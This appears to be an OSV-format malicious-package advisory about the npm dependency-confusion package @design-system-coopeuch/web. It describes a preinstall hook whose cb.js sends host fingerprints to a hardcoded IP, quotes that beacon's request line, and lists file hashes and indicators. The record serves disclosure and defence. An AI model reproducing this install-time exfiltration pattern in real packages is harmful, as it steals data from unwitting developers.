{
  "id": "MAL-2026-3653",
  "summary": "Malicious code in @design-system-coopeuch/web (npm)",
  "details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (a871445c3913d747a2f1383bcfdac02d6dec26ddb2053260340284cf4ee02233)\nPackage `@design-system-coopeuch/web@999.0.4` is a dependency-confusion squat of an internal-looking scope, published at an inflated 999.x version to override any private registry copy. `package.json` declares a `preinstall` hook that runs `cb.js`, which collects installer host identifiers (`os.hostname()`, cwd, install directory, `id`, `uname -a`, OS release info, and the full list of `process.env` key names) and POSTs them as JSON over cleartext HTTP to a hardcoded bare IP, `http://157.173.126.113:8443/dep-confusion` (cb.js line 20: `hostname: \"157.173.126.113\", port: 8443, path: \"/dep-confusion\", method: \"POST\"`). The beacon fires automatically on `npm install` without user consent. Although the package description self-labels as an \"authorized bug bounty PoC,\" any unintended installer has their host fingerprint exfiltrated to an attacker-controlled endpoint. The combination of internal-scope impersonation, inflated version, and install-time beacon to a bare IP is the canonical dependency-confusion attack shape.\n\n## Source: ossf-package-analysis (e91609499d64cf31c94ddc3047d4c189c64e8e5f09c3da98cb3fec5c05978823)\nThe OpenSSF Package Analysis project identified '@design-system-coopeuch/web' @ 999.0.0 (npm) as malicious.\n\nIt is considered malicious because:\n\n- The package executes one or more commands associated with malicious behavior.\n",
  "modified": "2026-05-15T07:52:17.599724Z",
  "published": "2026-05-13T02:46:17Z",
  "database_specific": {
    "malicious-packages-origins": [
      {
        "source": "ossf-package-analysis",
        "versions": ["999.0.0"],
        "import_time": "2026-05-13T09:07:58.812691011Z",
        "sha256": "e91609499d64cf31c94ddc3047d4c189c64e8e5f09c3da98cb3fec5c05978823",
        "modified_time": "2026-05-13T02:46:17Z"
      },
      {
        "source": "amazon-inspector",
        "versions": ["999.0.4"],
        "import_time": "2026-05-15T07:37:19.848171132Z",
        "id": "IN-MAL-2026-002780",
        "sha256": "a871445c3913d747a2f1383bcfdac02d6dec26ddb2053260340284cf4ee02233",
        "modified_time": "2026-05-14T21:28:49Z"
      },
      {
        "source": "amazon-inspector",
        "versions": ["999.0.0"],
        "import_time": "2026-05-15T07:37:19.664320794Z",
        "id": "IN-MAL-2026-002778",
        "sha256": "a9cb49ff96b31bfe45dc71bbdb2da10deebbce669349ee716dc54ca2bc5730e6",
        "modified_time": "2026-05-14T21:07:29Z"
      },
      {
        "source": "amazon-inspector",
        "versions": ["999.0.0"],
        "import_time": "2026-05-15T07:37:18.776464529Z",
        "id": "IN-MAL-2026-002748",
        "sha256": "c6a5d517f4c553ff117601cad9013ed774327d5054716118f863158b963f4098",
        "modified_time": "2026-05-14T19:25:43Z"
      },
      {
        "source": "amazon-inspector",
        "versions": ["999.0.4"],
        "import_time": "2026-05-15T07:37:18.854288051Z",
        "id": "IN-MAL-2026-002749",
        "sha256": "4490514d2a58551410f3fba0ab3425151aab2ec7bdf0490cbd64629032c839eb",
        "modified_time": "2026-05-14T19:25:44Z"
      },
      {
        "source": "amazon-inspector",
        "versions": ["999.0.0"],
        "import_time": "2026-05-15T07:37:19.708610392Z",
        "id": "IN-MAL-2026-002779",
        "sha256": "9f2dd3bd8d9cb5f43df394f4fd5b3e7673db125dca15b969d6d115cd3f255bca",
        "modified_time": "2026-05-14T21:09:00Z"
      }
    ]
  },
  "references": [
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/@design-system-coopeuch/web/v/999.0.4"
    },
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/@design-system-coopeuch/web/v/999.0.0"
    }
  ],
  "affected": [
    {
      "package": {
        "name": "@design-system-coopeuch/web",
        "ecosystem": "npm",
        "purl": "pkg:npm/%40design-system-coopeuch/web"
      },
      "versions": ["999.0.0", "999.0.4"],
      "database_specific": {
        "source": "https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@design-system-coopeuch/web/MAL-2026-3653.json",
        "cwes": [
          {
            "name": "Embedded Malicious Code",
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature."
          },
          {
            "name": "Embedded Malicious Code",
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature."
          },
          {
            "name": "Embedded Malicious Code",
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature."
          },
          {
            "name": "Embedded Malicious Code",
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature."
          },
          {
            "name": "Embedded Malicious Code",
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature."
          }
        ],
        "indicators": {
          "evidence_files": [
            {
              "tlsh": "390175f0b3d9abf035e571a0b0f20400f2a3c8697207b4d057c405f566ce57840322dd",
              "path": "cb.js",
              "sha256": "e0a192b06e2e1f7fe414a639db042f1cc36e0553438d862960d58c45d351383a"
            },
            {
              "tlsh": "c3d0973a0904a43320c807e014744001e260dc2f0100de288bc30068c22a7b3437bb0e",
              "path": "package.json",
              "sha256": "fff99c4797738dbb4fc2967a1d5f2a70444ffceab004b5497e6be5fb4be06da9"
            }
          ],
          "package_integrity": [
            {
              "hashes": {
                "sha1": "c22ac630a1390f8b178093865b23e858737a29d2",
                "sha512_sri": "sha512-iMZekSgCa3lCdCzXHw79aDx0QnM5JKARpeVoHRx96rqCM5c7rkb82NyyCvy+QYNj5MYFeGDnFFGjPFykzhgxgA=="
              },
              "filename": "web-999.0.4.tgz"
            }
          ]
        }
      }
    }
  ],
  "schema_version": "1.7.5",
  "credits": [
    {
      "name": "Amazon Inspector",
      "contact": ["actran@amazon.com"],
      "type": "FINDER"
    },
    {
      "name": "OpenSSF: Package Analysis",
      "contact": ["https://github.com/ossf/package-analysis", "https://openssf.slack.com/channels/package_analysis"],
      "type": "FINDER"
    }
  ]
}